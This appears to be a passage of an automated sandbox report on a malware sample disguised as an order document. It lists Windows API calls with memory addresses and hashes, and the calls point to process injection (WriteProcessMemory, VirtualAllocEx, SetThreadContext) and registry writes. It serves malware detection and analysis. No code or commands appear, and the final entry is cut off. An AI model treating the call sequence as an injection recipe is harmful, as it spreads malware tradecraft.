                                          • Instruction ID: 1bce7a8bedd0e132d58f1e70387276d728c3f4a1f7c52f91c6841d8ec0dd625f
                                          • Opcode Fuzzy Hash: 3121fa1cadbe03fcd1bac14393323c5abd86b16d55f2f0ae9afd59c26c957ea2
                                          • Instruction Fuzzy Hash: 53813571E007198FDB50CFA9C8817AEBBF6BF48314F148529E959EB284DB749981CF81
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0192AA06
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1715886937.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1920000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 59f0d0290f5d84a35bc0303710939e68736d9e98485a9bcece63119b0375e9f2
                                          • Instruction ID: 0a2783f3b38beaec8adb2ccb270a6c02d43032d5b1d13e2494a8aee3d392bb6d
                                          • Opcode Fuzzy Hash: 59f0d0290f5d84a35bc0303710939e68736d9e98485a9bcece63119b0375e9f2
                                          • Instruction Fuzzy Hash: 368175B1A00B158FD724DF2AD44475ABBF5FF88304F00892DD58AD7A44DB74E94ACB91
                                          APIs
                                          • CopyFileA.KERNEL32(?,?,?), ref: 06EE4B45
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: CopyFile
                                          • String ID:
                                          • API String ID: 1304948518-0
                                          • Opcode ID: 1882db755d5fa78f8bdc551a56ddf68bcf2b8a6d248e8e0a76473f3ed3ba3865
                                          • Instruction ID: 439325e3d9b82268f81c833880f2b33316d57385915e80a51071b065c25bf884
                                          • Opcode Fuzzy Hash: 1882db755d5fa78f8bdc551a56ddf68bcf2b8a6d248e8e0a76473f3ed3ba3865
                                          • Instruction Fuzzy Hash: 22518971D00769CFDB50DFA9C8857AEBBF1EF48324F148529E819E7284EB749881CB81
                                          APIs
                                          • CopyFileA.KERNEL32(?,?,?), ref: 06EE4B45
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: CopyFile
                                          • String ID:
                                          • API String ID: 1304948518-0
                                          • Opcode ID: 956224c750bc9b2aaa24eb9b225d7f636765c8ae9a73a7a6dc0995c11762ea72
                                          • Instruction ID: a248bb14d2cd21919fbd773d21bd4bf2fc7d0a63b2f52cd5b11734921479c5ea
                                          • Opcode Fuzzy Hash: 956224c750bc9b2aaa24eb9b225d7f636765c8ae9a73a7a6dc0995c11762ea72
                                          • Instruction Fuzzy Hash: 1F514971D00759CFDB50DFA9C8857AEBBF2EF48324F148629D859E7284EB749881CB81
                                          APIs
                                          • RegSetValueExA.KERNEL32(?,?,?,?,00000000,?), ref: 06EE4F12
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: Value
                                          • String ID:
                                          • API String ID: 3702945584-0
                                          • Opcode ID: 022722f06889ad34688729afcbf696c498173c0a4b2bc00426b2cb1020cdfe55
                                          • Instruction ID: e952150e50d314957c7ea066170f6b49e02aebb095c54b6627630efc787041dd
                                          • Opcode Fuzzy Hash: 022722f06889ad34688729afcbf696c498173c0a4b2bc00426b2cb1020cdfe55
                                          • Instruction Fuzzy Hash: FD4165B1D00718DFCB50CFA9C88569EBBF1FF48714F10942AE819AB280DB389845CB91
                                          APIs
                                          • RegSetValueExA.KERNEL32(?,?,?,?,00000000,?), ref: 06EE4F12
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: Value
                                          • String ID:
                                          • API String ID: 3702945584-0
                                          • Opcode ID: de1d418a35f03f47e8090bc6657ec9181d07a37cb31a9cefa85590ef59ba984a
                                          • Instruction ID: e1bb008ca9c34213a0dcbe044a8949069434d45b89c4b6962b350c041c90dd84
                                          • Opcode Fuzzy Hash: de1d418a35f03f47e8090bc6657ec9181d07a37cb31a9cefa85590ef59ba984a
                                          • Instruction Fuzzy Hash: E24174B1D00718CFCB60CFA9C88579EBBF1FF48714F10902AE819AB290DB789845CB91
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 06EE4D33
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: 8e8d224dfba7395aedb51c3d7a2cec2e9bc2db33c7006bab0bfd2b636acc3af7
                                          • Instruction ID: 1d01c8d109987e6bded50f2a0b54682a21222a21d93976f05fde3dcfade2f2cf
                                          • Opcode Fuzzy Hash: 8e8d224dfba7395aedb51c3d7a2cec2e9bc2db33c7006bab0bfd2b636acc3af7
                                          • Instruction Fuzzy Hash: B64162B1E00318DFDB10DFA9C885B9EBBF1BF48314F14852AE818AB280DB749845CF91
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 06EE4D33
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: fd66fd4bd14c30498dccae1a4b6b8361fe4967f16539f443fac310b8ed29b648
                                          • Instruction ID: 9a6bbbdb51f4501bd30dc0ee320ba2ccb88b03ffec19cb6f59ecab06f69445a4
                                          • Opcode Fuzzy Hash: fd66fd4bd14c30498dccae1a4b6b8361fe4967f16539f443fac310b8ed29b648
                                          • Instruction Fuzzy Hash: A74144B0D00318DFDB10DFA9C885B9EBBF1BF48314F14852AE819AB280DB749845CF91
                                          APIs
                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06EE3400
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 3b8ebd1778877ca9436847a83b05985463b5868fc3bdaed52867cbdac2d9dffb
                                          • Instruction ID: 985ec5c55949c20b0d8e511137c4caa4d46dc46699f67946dbab41e454f341e7
                                          • Opcode Fuzzy Hash: 3b8ebd1778877ca9436847a83b05985463b5868fc3bdaed52867cbdac2d9dffb
                                          • Instruction Fuzzy Hash: D12148B19003099FCB10DFA9C885BDEBBF5FF48320F10842AE959A7241C7799945DFA4
                                          APIs
                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06EE3400
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: b852921d7fb2fee76eb7003e9efe9e2cdef0faede2f270beef9b3bbbdade3375
                                          • Instruction ID: 0b4d6716113ec086c49463e307e7e0449f3a16a8492592be8a4140b0931a3077
                                          • Opcode Fuzzy Hash: b852921d7fb2fee76eb7003e9efe9e2cdef0faede2f270beef9b3bbbdade3375
                                          • Instruction Fuzzy Hash: 7E2139B1D003499FCB10DFAAC885BDEBBF5FF48310F10842AE919A7241D7789955CBA4
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06EE2ECE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 9b7b7fa92d709c5b3638d047c8615716981c7df0b714b725fad2f9e2e2dce49e
                                          • Instruction ID: 02c8332cdeac3a5be232f0932c69ee63561ba2d505bdb52a52d6b3a59c5acc5a
                                          • Opcode Fuzzy Hash: 9b7b7fa92d709c5b3638d047c8615716981c7df0b714b725fad2f9e2e2dce49e
                                          • Instruction Fuzzy Hash: FB2148B19003088FCB10DFAAC4857EEBFF4AB88324F14842AD519A7241CB789A44CBA5
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06EE37D4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 47f2ddcff61922de42c6b19f49f94e6ceb391524b61f48f690fa9e02510c9eb6
                                          • Instruction ID: 234fdd514e1bf86b7dd1326dc35d581d920078c30fa31b8e807d80476d175d62
                                          • Opcode Fuzzy Hash: 47f2ddcff61922de42c6b19f49f94e6ceb391524b61f48f690fa9e02510c9eb6
                                          • Instruction Fuzzy Hash: 1F2128B19043499FDB10DFAAC445AAFFBF4EF48320F10842DD459A7240DB7995458BA5
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0192D117
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1715886937.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1920000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 40d3fd8e17dae8b06733902b8dde6dd90045c48ba1d8c2805c4778c14f7251a7
                                          • Instruction ID: 568042ef4e624bcd40a02e98932da4ec81ec52bf9eb938739d1eeb127352c2f3
                                          • Opcode Fuzzy Hash: 40d3fd8e17dae8b06733902b8dde6dd90045c48ba1d8c2805c4778c14f7251a7
                                          • Instruction Fuzzy Hash: E321F2B59003189FDB10CFA9D984AEEBBF4FB48320F14801AE918A3251D378A954CFA0
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06EE2ECE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 3e33bc2dca0214ba6cbc87e71d9470b4a6ac96ddf9d6f40b18701ff5c872e7bb
                                          • Instruction ID: a023278b9742a327f0bba27a30fc3138fb553807f6b2a9d363ef234013afcbf0
                                          • Opcode Fuzzy Hash: 3e33bc2dca0214ba6cbc87e71d9470b4a6ac96ddf9d6f40b18701ff5c872e7bb
                                          • Instruction Fuzzy Hash: 2A2137B19003098FDB10DFAAC4857AEBBF4EB88324F14842AD519A7240DB789A45CBA4
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0192D117
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1715886937.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1920000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: fb54258a5ebe1eaf0b32af81295b7731464d1756eaca5d65078e118ff8df3ac0
                                          • Instruction ID: a10ca9101b8a8f45647517e113b52ad9f7b668dd2d8a7f284fdd1da0eca4fae2
                                          • Opcode Fuzzy Hash: fb54258a5ebe1eaf0b32af81295b7731464d1756eaca5d65078e118ff8df3ac0
                                          • Instruction Fuzzy Hash: 5821E3B59003589FDB10CF9AD984ADEFFF8FB48320F14801AE918A3251D378A954CFA0
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06EE37D4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 991e282e7c5b127d718c6ab42ca22838d4c46fe8128058552863209a1d66e2cb
                                          • Instruction ID: 40a5276e23af80b4de6bc308673104cfefaa4037d29d3a7fe001dc485027681c
                                          • Opcode Fuzzy Hash: 991e282e7c5b127d718c6ab42ca22838d4c46fe8128058552863209a1d66e2cb
                                          • Instruction Fuzzy Hash: 862104B19003098FDB10DFAAC845AAFFBF5EF88320F50842AD459A7240DB7899458BA1
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06EE32DE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 27f9a80e106d26629e3a36acbceccc44d0d92ea582e85ca5a9b2fc8d1cbd446c
                                          • Instruction ID: 6f561f209c01f4407655a15d27fe1cc63575a5cf1e72fa327b75f0b35c273e00
                                          • Opcode Fuzzy Hash: 27f9a80e106d26629e3a36acbceccc44d0d92ea582e85ca5a9b2fc8d1cbd446c
                                          • Instruction Fuzzy Hash: C41133718003499FCB10DFAAC845ADFBBF5EB88320F20841AE559A7250CB75A954CFA4
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0192931D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1715886937.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1920000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: a69b7005a349011ae8f7868afe0ac49a3c84d65039e04d6efbb1406612512cfa
                                          • Instruction ID: fb2982dd14def97307ca3256bf7795a11cef08266c6f99e611f42dc5bf390eae
                                          • Opcode Fuzzy Hash: a69b7005a349011ae8f7868afe0ac49a3c84d65039e04d6efbb1406612512cfa
                                          • Instruction Fuzzy Hash: 3A219DB1808399CEDB11DF69D5047DEBFF4EB05324F15809ED988B7282C3795A44CBA2
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 06F5D694
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736118241.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f50000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 50984c23a98c8040109d44aa85577ec74a0bd57f4301720b11b35e6f73d8d585
                                          • Instruction ID: 702476fd72a2737347714d093919e79d24975e0981510af10c06c4c3f509eec7
                                          • Opcode Fuzzy Hash: 50984c23a98c8040109d44aa85577ec74a0bd57f4301720b11b35e6f73d8d585
                                          • Instruction Fuzzy Hash: 6E11F4B1D003499FCB10DFAAC844A9FFBF5EF88320F10842AD519A7240DB75A945CFA5
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06EE32DE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 9be7cd545bb1b3378877d081fb925296acdddb3da0e027795a31f65949682973
                                          • Instruction ID: 34338883569496c2078f16dccb16da43d0ad66fa24938993de6234e1f2372ef0
                                          • Opcode Fuzzy Hash: 9be7cd545bb1b3378877d081fb925296acdddb3da0e027795a31f65949682973
                                          • Instruction Fuzzy Hash: 411126719003499FCB10DFAAC845ADFFFF5EB88324F10841AE559A7250CB75A954CFA4
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0192931D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1715886937.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1920000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: a99b42d376a9facc5c01a01a5dcec246acbeba5af3821fe4cf6017d86fb819cf
                                          • Instruction ID: fd7f2a552c8dea869dfb650b1a4761b210d4262ee87d4f4285a59ef7555ad3d5
                                          • Opcode Fuzzy Hash: a99b42d376a9facc5c01a01a5dcec246acbeba5af3821fe4cf6017d86fb819cf
                                          • Instruction Fuzzy Hash: 9A11C1B1804398CEDB20DF59D4047EEBFF4EB09314F148099D989B3286C3395644CBA1
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0192AA06
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1715886937.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1920000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: b1b897ddd18ff1ed36d7ad435270982aceb3a48c9cc733bae3b8a903113ed338
                                          • Instruction ID: 13831bdd01bb9fad039c0ad51ebe9219b3503578205f0cbaab4fe4c958b7c154
                                          • Opcode Fuzzy Hash: b1b897ddd18ff1ed36d7ad435270982aceb3a48c9cc733bae3b8a903113ed338
                                          • Instruction Fuzzy Hash: 81110FB6C003498FDB10DF9AD544A9EFBF9AF88220F10841AD429B7604D379A545CFA5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (bq
                                          • API String ID: 0-149360118
                                          • Opcode ID: f231164973cf8b37a1c8408600366a3c6bfab0ef3d2166850baf748c735c9877
                                          • Instruction ID: fe7c61d82b0214a6b417ad04ba56e7aaef2deaf44d0cc40d2a402fe4d6f2dd37
                                          • Opcode Fuzzy Hash: f231164973cf8b37a1c8408600366a3c6bfab0ef3d2166850baf748c735c9877
                                          • Instruction Fuzzy Hash: DDA1B2317002409FC7569F68D854E6A7BB7FFC9304B1981A9E6068F7A1DB36EC06CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,bq
                                          • API String ID: 0-2474004448
                                          • Opcode ID: e1bebb4cd352f38518cc7d1b740698884d11c3e28e5d6159e84084f597f11a90
                                          • Instruction ID: 18e78ac843d0940fcf7772108a3d2650d5143f33e76dce1fcd39341a56c0552c
                                          • Opcode Fuzzy Hash: e1bebb4cd352f38518cc7d1b740698884d11c3e28e5d6159e84084f597f11a90
                                          • Instruction Fuzzy Hash: 67C14075A102289FDB54DB68C954BDDBBF6BF88701F158099E509EB360CB309D81CFA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PH^q
                                          • API String ID: 0-2549759414
                                          • Opcode ID: bf4b546750123402e0167693b752d846b1857759f37c1b8c4feda7794691415b
                                          • Instruction ID: e65c59fcf1d12aee40b655de4b4d2c0f0c535cf5ff07f44e7def79552f9692a9
                                          • Opcode Fuzzy Hash: bf4b546750123402e0167693b752d846b1857759f37c1b8c4feda7794691415b
                                          • Instruction Fuzzy Hash: 92B10774E01218CFEBA0CFA8D948BADBBF2FF45305F1880A9D549AB251E7745985CF02
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q
                                          • API String ID: 0-1614139903
                                          • Opcode ID: b0a3f9ff15d76ee5c43f1b65b7d9917ed659466f1656a0ed83bb583e05e3cc84
                                          • Instruction ID: 763a1ffaecc52ed05e9a769a3866e4fe9e2435a3286aef79a67347c1fee4418c
                                          • Opcode Fuzzy Hash: b0a3f9ff15d76ee5c43f1b65b7d9917ed659466f1656a0ed83bb583e05e3cc84
                                          • Instruction Fuzzy Hash: 9BA1FB34A10218DFCB54EFA4D89899DBBB2FF89300F158159E505AB361DB30EC42CFA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (bq
                                          • API String ID: 0-149360118
                                          • Opcode ID: d0c399b61a1b2c188d0c60e4ea03e427625073940fa331e87e74160c8ee84fbf
                                          • Instruction ID: 172fa87ac29f36d1a362d1471c1e6daf1463e2f818c1dcf0edf75821551c8fed
                                          • Opcode Fuzzy Hash: d0c399b61a1b2c188d0c60e4ea03e427625073940fa331e87e74160c8ee84fbf
                                          • Instruction Fuzzy Hash: 04715A34B00A14DFCB44EF64C494AADB7B6EF89300F518569D5069B3A4EF74ED42CBA2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PH^q
                                          • API String ID: 0-2549759414
                                          • Opcode ID: e240926795fc3845c0551748d7d2cf7ca7c90fbc73984330f34f3dcf24107e5e
                                          • Instruction ID: b12a7aefa0f957d23986ec67a4a1b80150d2e9ee6a9f909d122b95e0d37cc001
                                          • Opcode Fuzzy Hash: e240926795fc3845c0551748d7d2cf7ca7c90fbc73984330f34f3dcf24107e5e
                                          • Instruction Fuzzy Hash: CC811974D02218DFEBA0CFA8D548BADBBF2FB05305F1880A9D549AB251E7745D84CF42
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (bq
                                          • API String ID: 0-149360118
                                          • Opcode ID: a61ced4b74fe65c879e783bf6d282736068259175743f5a06d4f8bee3d78e8f8
                                          • Instruction ID: 0a003110847bb8e6b58337eb06049ceb8816a60bc49798cd9939292bc56b5b33
                                          • Opcode Fuzzy Hash: a61ced4b74fe65c879e783bf6d282736068259175743f5a06d4f8bee3d78e8f8
                                          • Instruction Fuzzy Hash: 1A51F331A0161A8FCB10CF68D8849AAFBB6FF8A360B158695E5259B381D730FC51CBD0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: pbq
                                          • API String ID: 0-3896149868
                                          • Opcode ID: 971243e7e0f32a46373866592e8f5a8261d0b57f5346d0e2224f25f2891b5a0f
                                          • Instruction ID: b2c6bc9425f7ad2301794e90c449ac3a9d25879c832c2ea8bc9f34614f2a7663
                                          • Opcode Fuzzy Hash: 971243e7e0f32a46373866592e8f5a8261d0b57f5346d0e2224f25f2891b5a0f
                                          • Instruction Fuzzy Hash: 09513D76600104EFDB499FA8D814D69BBF7FF8C31471A8098E6099F272D632DC21EB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: <
                                          • API String ID: 0-4251816714
                                          • Opcode ID: dcf928adb15deba6406f036cb722f1bcdfefe53e994aab4c94723a39f7cf7cb0
                                          • Instruction ID: ddd2a163c7ccb2c35940d915461302bbd251a05a5abb11f950546b9ee0dfcf1e
                                          • Opcode Fuzzy Hash: dcf928adb15deba6406f036cb722f1bcdfefe53e994aab4c94723a39f7cf7cb0
                                          • Instruction Fuzzy Hash: AB610575D05258CFEBA4DF59D848BD9BBB6AB89304F0090EAC50EB7250CB744AC9CF51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: <
                                          • API String ID: 0-4251816714
                                          • Opcode ID: 3cf7cf778e3220faf4aa1576b49f3f7e7508cb49bca0a7c23ef1a485cde1759e
                                          • Instruction ID: 1ae5077588ec1ae029043e5c69b96add890876168a992045ccaf3b223f1e94bd
                                          • Opcode Fuzzy Hash: 3cf7cf778e3220faf4aa1576b49f3f7e7508cb49bca0a7c23ef1a485cde1759e
                                          • Instruction Fuzzy Hash: 8D61D574D01268CFEBA0DF69C888BD9BBB1AB49305F1094EAC60DB7650DB744AC5CF61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'^q
                                          • API String ID: 0-1614139903
                                          • Opcode ID: 5564d5dc728021c3748cb57c5f968ba8a4de1b53f45436d43ec84af24d813b7a
                                          • Instruction ID: bba837066702008226c53c9442445b8c7afba2a5527a40919268e6e08a2dd1f3
                                          • Opcode Fuzzy Hash: 5564d5dc728021c3748cb57c5f968ba8a4de1b53f45436d43ec84af24d813b7a
